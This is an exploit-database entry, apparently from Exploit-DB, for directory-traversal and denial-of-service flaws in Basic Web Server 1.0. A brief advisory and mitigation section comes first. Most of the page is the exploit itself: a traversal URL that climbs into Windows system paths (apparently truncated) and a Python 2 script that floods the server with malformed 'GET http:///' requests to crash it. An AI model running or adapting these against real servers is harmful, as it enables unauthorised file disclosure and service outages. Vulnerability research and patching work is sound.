header-logo
Suggest Exploit
vendor:
Basic Web Server
by:
7.5
CVSS
HIGH
Directory Traversal, Denial-of-Service
22, 400
CWE
Product Name: Basic Web Server
Affected Version From: 1
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:

Directory Traversal and Denial-of-Service Vulnerabilities in Basic Web Server

The Basic Web Server is vulnerable to a directory-traversal vulnerability and a denial-of-service vulnerability. Exploiting these issues allows attackers to obtain sensitive information or cause denial-of-service conditions.

Mitigation:

Apply updates or patches provided by the vendor. Restrict access to the vulnerable server. Implement proper input validation and sanitization to prevent directory-traversal attacks.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/43356/info

Basic Web Server is prone to a directory-traversal vulnerability and a denial-of-service vulnerability.

Exploiting these issues will allow attackers to obtain sensitive information or cause denial-of-service conditions.

Basic Web Server 1.0 is vulnerable; other versions may also be affected. 

http://www.example.com/?../../../../../../../../../../windows/win.

import socket

host = 'localhost'
port = 80

include_file = True
complete_path = True

try:
    for i in range(0, 1024):

        for x in range(0, 8):
            s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            s.connect((host, port))
            s.settimeout(2)
            s.send('GET http:/// HTTP/1.1\r\n'
                   'Host: ' + host + '\r\n\r\n')
            print '.',

        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((host, port))
        s.settimeout(2)
        s.send('GET / HTTP/1.1\r\n'
               'Host: ' + host + '\r\n\r\n')
        s.recv(8192)

        print 'response received'
except:
    print 'error contacting server'